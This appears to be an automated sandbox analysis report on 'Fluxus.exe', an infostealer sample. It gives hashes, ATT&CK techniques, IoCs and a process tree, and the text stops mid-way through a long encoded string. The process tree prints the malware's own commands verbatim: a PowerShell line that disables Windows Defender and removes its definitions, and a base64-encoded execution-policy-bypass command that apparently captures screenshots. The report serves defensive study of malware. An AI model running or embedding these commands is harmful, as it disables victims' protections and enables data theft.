1a2354417a8da9eb981c11a7502d04aa4414908e34eb3031bf5be70c112c72bc

Analysis

max time kernel
144s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
07/01/2024, 18:56

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Fluxus.exe
Size

9.2MB
MD5

3ab53155c4bdf2d597b01fcbed08d9f0
SHA1

ea5954af9b8f6002b0d9846169fd4f6e857e9edd
SHA256

1a2354417a8da9eb981c11a7502d04aa4414908e34eb3031bf5be70c112c72bc
SHA512

1b5243f2b54dd644c42c0af624af6acf7d11c92ef5d4d8258b26bbc6837b4e803b9f2c11c8c2bb34012cbf845abc732ca1e0a275385b336d191369cac2fa8fc4
SSDEEP

196608:QW0cDedIK36BDLjv+bhqNVoBKUh8mz4Iv9PFu1D7R0o:AiedF36JL+9qz8/b4ITuRSo

Score

7^/10

spyware stealer upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2780	bound.exe
4864	rar.exe

Loads dropped DLL 19 IoCs

pid	Process
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
1708	Fluxus.exe
2780	bound.exe
2780	bound.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 51 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000023224-22.dat	upx
behavioral2/files/0x0006000000023224-23.dat	upx
behavioral2/memory/1708-26-0x00007FFADDC70000-0x00007FFADE259000-memory.dmp	upx
behavioral2/files/0x0006000000023215-28.dat	upx
behavioral2/memory/1708-49-0x00007FFAF0AE0000-0x00007FFAF0B03000-memory.dmp	upx
behavioral2/memory/1708-50-0x00007FFAF2CE0000-0x00007FFAF2CEF000-memory.dmp	upx
behavioral2/files/0x000600000002321c-48.dat	upx
behavioral2/files/0x000600000002321b-47.dat	upx
behavioral2/files/0x000600000002321a-46.dat	upx
behavioral2/files/0x0006000000023219-45.dat	upx
behavioral2/files/0x0006000000023218-44.dat	upx
behavioral2/files/0x0006000000023217-43.dat	upx
behavioral2/files/0x0006000000023216-42.dat	upx
behavioral2/files/0x0006000000023214-41.dat	upx
behavioral2/files/0x0006000000023229-40.dat	upx
behavioral2/files/0x0006000000023228-39.dat	upx
behavioral2/files/0x0006000000023227-38.dat	upx
behavioral2/files/0x0006000000023223-35.dat	upx
behavioral2/files/0x0006000000023221-34.dat	upx
behavioral2/files/0x0006000000023222-30.dat	upx
behavioral2/files/0x0006000000023218-55.dat	upx
behavioral2/memory/1708-56-0x00007FFAED7A0000-0x00007FFAED7CD000-memory.dmp	upx
behavioral2/files/0x0006000000023228-61.dat	upx
behavioral2/memory/1708-62-0x00007FFADD8A0000-0x00007FFADDA17000-memory.dmp	upx
behavioral2/memory/1708-60-0x00007FFAED710000-0x00007FFAED733000-memory.dmp	upx
behavioral2/memory/1708-65-0x00007FFAEDB20000-0x00007FFAEDB39000-memory.dmp	upx
behavioral2/memory/1708-72-0x00007FFADD7D0000-0x00007FFADD89D000-memory.dmp	upx
behavioral2/memory/1708-73-0x00007FFADDC70000-0x00007FFADE259000-memory.dmp	upx
behavioral2/files/0x0006000000023221-71.dat	upx
behavioral2/files/0x0006000000023221-70.dat	upx
behavioral2/files/0x0006000000023229-83.dat	upx
behavioral2/memory/1708-85-0x00007FFADCF20000-0x00007FFADD03C000-memory.dmp	upx
behavioral2/memory/1708-84-0x00007FFAF0AE0000-0x00007FFAF0B03000-memory.dmp	upx
behavioral2/memory/1708-80-0x00007FFAED950000-0x00007FFAED964000-memory.dmp	upx
behavioral2/memory/1708-78-0x00007FFAED790000-0x00007FFAED79D000-memory.dmp	upx
behavioral2/memory/1708-136-0x00007FFAED710000-0x00007FFAED733000-memory.dmp	upx
behavioral2/memory/1708-175-0x00007FFADD8A0000-0x00007FFADDA17000-memory.dmp	upx
behavioral2/memory/1708-177-0x00007FFAEDB20000-0x00007FFAEDB39000-memory.dmp	upx
behavioral2/memory/1708-202-0x00007FFAED6D0000-0x00007FFAED703000-memory.dmp	upx
behavioral2/memory/1708-203-0x00007FFADD7D0000-0x00007FFADD89D000-memory.dmp	upx
behavioral2/memory/1708-257-0x00007FFADD2A0000-0x00007FFADD7C2000-memory.dmp	upx
behavioral2/memory/1708-75-0x00007FFADD2A0000-0x00007FFADD7C2000-memory.dmp	upx
behavioral2/memory/1708-69-0x00007FFAED6D0000-0x00007FFAED703000-memory.dmp	upx
behavioral2/files/0x0006000000023223-68.dat	upx
behavioral2/memory/1708-66-0x00007FFAF2CD0000-0x00007FFAF2CDD000-memory.dmp	upx
behavioral2/memory/1708-58-0x00007FFAF09E0000-0x00007FFAF09F9000-memory.dmp	upx
behavioral2/memory/1708-374-0x00007FFADD8A0000-0x00007FFADDA17000-memory.dmp	upx
behavioral2/memory/1708-369-0x00007FFAF0AE0000-0x00007FFAF0B03000-memory.dmp	upx
behavioral2/memory/1708-368-0x00007FFADDC70000-0x00007FFADE259000-memory.dmp	upx
behavioral2/memory/1708-424-0x00007FFADDC70000-0x00007FFADE259000-memory.dmp	upx
behavioral2/memory/1708-471-0x00007FFADDC70000-0x00007FFADE259000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	bound.exe
File opened (read-only)	\??\I:	bound.exe
File opened (read-only)	\??\N:	bound.exe
File opened (read-only)	\??\O:	bound.exe
File opened (read-only)	\??\Q:	bound.exe
File opened (read-only)	\??\S:	bound.exe
File opened (read-only)	\??\V:	bound.exe
File opened (read-only)	\??\E:	bound.exe
File opened (read-only)	\??\K:	bound.exe
File opened (read-only)	\??\U:	bound.exe
File opened (read-only)	\??\W:	bound.exe
File opened (read-only)	\??\Z:	bound.exe
File opened (read-only)	\??\A:	bound.exe
File opened (read-only)	\??\G:	bound.exe
File opened (read-only)	\??\J:	bound.exe
File opened (read-only)	\??\P:	bound.exe
File opened (read-only)	\??\R:	bound.exe
File opened (read-only)	\??\Y:	bound.exe
File opened (read-only)	\??\B:	bound.exe
File opened (read-only)	\??\H:	bound.exe
File opened (read-only)	\??\L:	bound.exe
File opened (read-only)	\??\M:	bound.exe
File opened (read-only)	\??\T:	bound.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
23	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5920	WMIC.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
1340	tasklist.exe
4640	tasklist.exe
4444	tasklist.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	bound.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	bound.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4932	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

pid	Process
1632	powershell.exe
1632	powershell.exe
1908	powershell.exe
1908	powershell.exe
1664	powershell.exe
1664	powershell.exe
2228	Conhost.exe
2228	Conhost.exe
1664	powershell.exe
1664	powershell.exe
1632	powershell.exe
1632	powershell.exe
1908	powershell.exe
1908	powershell.exe
2228	Conhost.exe
2228	Conhost.exe
1016	powershell.exe
1016	powershell.exe
2464	powershell.exe
2464	powershell.exe
2464	powershell.exe
1016	powershell.exe
5944	powershell.exe
5944	powershell.exe
5944	powershell.exe
5152	powershell.exe
5152	powershell.exe
5152	powershell.exe
5832	powershell.exe
5832	powershell.exe
5832	powershell.exe
556	powershell.exe
556	powershell.exe
556	powershell.exe
2780	bound.exe
2780	bound.exe
2780	bound.exe
4596	msedge.exe
4596	msedge.exe
3020	msedge.exe
3020	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	2228	Conhost.exe
Token: SeIncreaseQuotaPrivilege	1192	WMIC.exe
Token: SeSecurityPrivilege	1192	WMIC.exe
Token: SeTakeOwnershipPrivilege	1192	WMIC.exe
Token: SeLoadDriverPrivilege	1192	WMIC.exe
Token: SeSystemProfilePrivilege	1192	WMIC.exe
Token: SeSystemtimePrivilege	1192	WMIC.exe
Token: SeProfSingleProcessPrivilege	1192	WMIC.exe
Token: SeIncBasePriorityPrivilege	1192	WMIC.exe
Token: SeCreatePagefilePrivilege	1192	WMIC.exe
Token: SeBackupPrivilege	1192	WMIC.exe
Token: SeRestorePrivilege	1192	WMIC.exe
Token: SeShutdownPrivilege	1192	WMIC.exe
Token: SeDebugPrivilege	1192	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1192	WMIC.exe
Token: SeRemoteShutdownPrivilege	1192	WMIC.exe
Token: SeUndockPrivilege	1192	WMIC.exe
Token: SeManageVolumePrivilege	1192	WMIC.exe
Token: 33	1192	WMIC.exe
Token: 34	1192	WMIC.exe
Token: 35	1192	WMIC.exe
Token: 36	1192	WMIC.exe
Token: SeDebugPrivilege	4640	tasklist.exe
Token: SeDebugPrivilege	1340	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1192	WMIC.exe
Token: SeSecurityPrivilege	1192	WMIC.exe
Token: SeTakeOwnershipPrivilege	1192	WMIC.exe
Token: SeLoadDriverPrivilege	1192	WMIC.exe
Token: SeSystemProfilePrivilege	1192	WMIC.exe
Token: SeSystemtimePrivilege	1192	WMIC.exe
Token: SeProfSingleProcessPrivilege	1192	WMIC.exe
Token: SeIncBasePriorityPrivilege	1192	WMIC.exe
Token: SeCreatePagefilePrivilege	1192	WMIC.exe
Token: SeBackupPrivilege	1192	WMIC.exe
Token: SeRestorePrivilege	1192	WMIC.exe
Token: SeShutdownPrivilege	1192	WMIC.exe
Token: SeDebugPrivilege	1192	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1192	WMIC.exe
Token: SeRemoteShutdownPrivilege	1192	WMIC.exe
Token: SeUndockPrivilege	1192	WMIC.exe
Token: SeManageVolumePrivilege	1192	WMIC.exe
Token: 33	1192	WMIC.exe
Token: 34	1192	WMIC.exe
Token: 35	1192	WMIC.exe
Token: 36	1192	WMIC.exe
Token: SeDebugPrivilege	4444	tasklist.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	2780	bound.exe
Token: SeDebugPrivilege	5944	powershell.exe
Token: SeDebugPrivilege	5152	powershell.exe
Token: SeIncreaseQuotaPrivilege	1088	WMIC.exe
Token: SeSecurityPrivilege	1088	WMIC.exe
Token: SeTakeOwnershipPrivilege	1088	WMIC.exe
Token: SeLoadDriverPrivilege	1088	WMIC.exe
Token: SeSystemProfilePrivilege	1088	WMIC.exe
Token: SeSystemtimePrivilege	1088	WMIC.exe
Token: SeProfSingleProcessPrivilege	1088	WMIC.exe
Token: SeIncBasePriorityPrivilege	1088	WMIC.exe
Token: SeCreatePagefilePrivilege	1088	WMIC.exe
Token: SeBackupPrivilege	1088	WMIC.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
2780	bound.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe
3020	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1916 wrote to memory of 1708	1916	Fluxus.exe	88
PID 1916 wrote to memory of 1708	1916	Fluxus.exe	88
PID 1708 wrote to memory of 5032	1708	Fluxus.exe	183
PID 1708 wrote to memory of 5032	1708	Fluxus.exe	183
PID 1708 wrote to memory of 2836	1708	Fluxus.exe	92
PID 1708 wrote to memory of 2836	1708	Fluxus.exe	92
PID 1708 wrote to memory of 3240	1708	Fluxus.exe	182
PID 1708 wrote to memory of 3240	1708	Fluxus.exe	182
PID 1708 wrote to memory of 3980	1708	Fluxus.exe	180
PID 1708 wrote to memory of 3980	1708	Fluxus.exe	180
PID 1708 wrote to memory of 1128	1708	Fluxus.exe	179
PID 1708 wrote to memory of 1128	1708	Fluxus.exe	179
PID 2836 wrote to memory of 1664	2836	cmd.exe	177
PID 2836 wrote to memory of 1664	2836	cmd.exe	177
PID 5032 wrote to memory of 1632	5032	cmd.exe	97
PID 5032 wrote to memory of 1632	5032	cmd.exe	97
PID 3980 wrote to memory of 2780	3980	cmd.exe	96
PID 3980 wrote to memory of 2780	3980	cmd.exe	96
PID 3980 wrote to memory of 2780	3980	cmd.exe	96
PID 1128 wrote to memory of 1908	1128	cmd.exe	100
PID 1128 wrote to memory of 1908	1128	cmd.exe	100
PID 3240 wrote to memory of 2228	3240	cmd.exe	152
PID 3240 wrote to memory of 2228	3240	cmd.exe	152
PID 1708 wrote to memory of 2120	1708	Fluxus.exe	101
PID 1708 wrote to memory of 2120	1708	Fluxus.exe	101
PID 1708 wrote to memory of 716	1708	Fluxus.exe	176
PID 1708 wrote to memory of 716	1708	Fluxus.exe	176
PID 1708 wrote to memory of 3104	1708	Fluxus.exe	174
PID 1708 wrote to memory of 3104	1708	Fluxus.exe	174
PID 1708 wrote to memory of 980	1708	Fluxus.exe	173
PID 1708 wrote to memory of 980	1708	Fluxus.exe	173
PID 1708 wrote to memory of 2800	1708	Fluxus.exe	129
PID 1708 wrote to memory of 2800	1708	Fluxus.exe	129
PID 1708 wrote to memory of 2584	1708	Fluxus.exe	128
PID 1708 wrote to memory of 2584	1708	Fluxus.exe	128
PID 1708 wrote to memory of 2040	1708	Fluxus.exe	117
PID 1708 wrote to memory of 2040	1708	Fluxus.exe	117
PID 1708 wrote to memory of 4892	1708	Fluxus.exe	113
PID 1708 wrote to memory of 4892	1708	Fluxus.exe	113
PID 1708 wrote to memory of 3840	1708	Fluxus.exe	108
PID 1708 wrote to memory of 3840	1708	Fluxus.exe	108
PID 3104 wrote to memory of 1192	3104	cmd.exe	107
PID 3104 wrote to memory of 1192	3104	cmd.exe	107
PID 2120 wrote to memory of 4640	2120	cmd.exe	112
PID 2120 wrote to memory of 4640	2120	cmd.exe	112
PID 716 wrote to memory of 1340	716	cmd.exe	111
PID 716 wrote to memory of 1340	716	cmd.exe	111
PID 2584 wrote to memory of 4436	2584	cmd.exe	116
PID 2584 wrote to memory of 4436	2584	cmd.exe	116
PID 2040 wrote to memory of 2036	2040	cmd.exe	115
PID 2040 wrote to memory of 2036	2040	cmd.exe	115
PID 980 wrote to memory of 1016	980	cmd.exe	127
PID 980 wrote to memory of 1016	980	cmd.exe	127
PID 3840 wrote to memory of 2464	3840	cmd.exe	126
PID 3840 wrote to memory of 2464	3840	cmd.exe	126
PID 2800 wrote to memory of 4444	2800	cmd.exe	119
PID 2800 wrote to memory of 4444	2800	cmd.exe	119
PID 4892 wrote to memory of 4932	4892	cmd.exe	118
PID 4892 wrote to memory of 4932	4892	cmd.exe	118
PID 1708 wrote to memory of 5128	1708	Fluxus.exe	121
PID 1708 wrote to memory of 5128	1708	Fluxus.exe	121
PID 5128 wrote to memory of 5456	5128	cmd.exe	125
PID 5128 wrote to memory of 5456	5128	cmd.exe	125
PID 1708 wrote to memory of 5492	1708	Fluxus.exe	191

C:\Users\Admin\AppData\Local\Temp\Fluxus.exe
"C:\Users\Admin\AppData\Local\Temp\Fluxus.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1916
- C:\Users\Admin\AppData\Local\Temp\Fluxus.exe
  "C:\Users\Admin\AppData\Local\Temp\Fluxus.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2120
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbg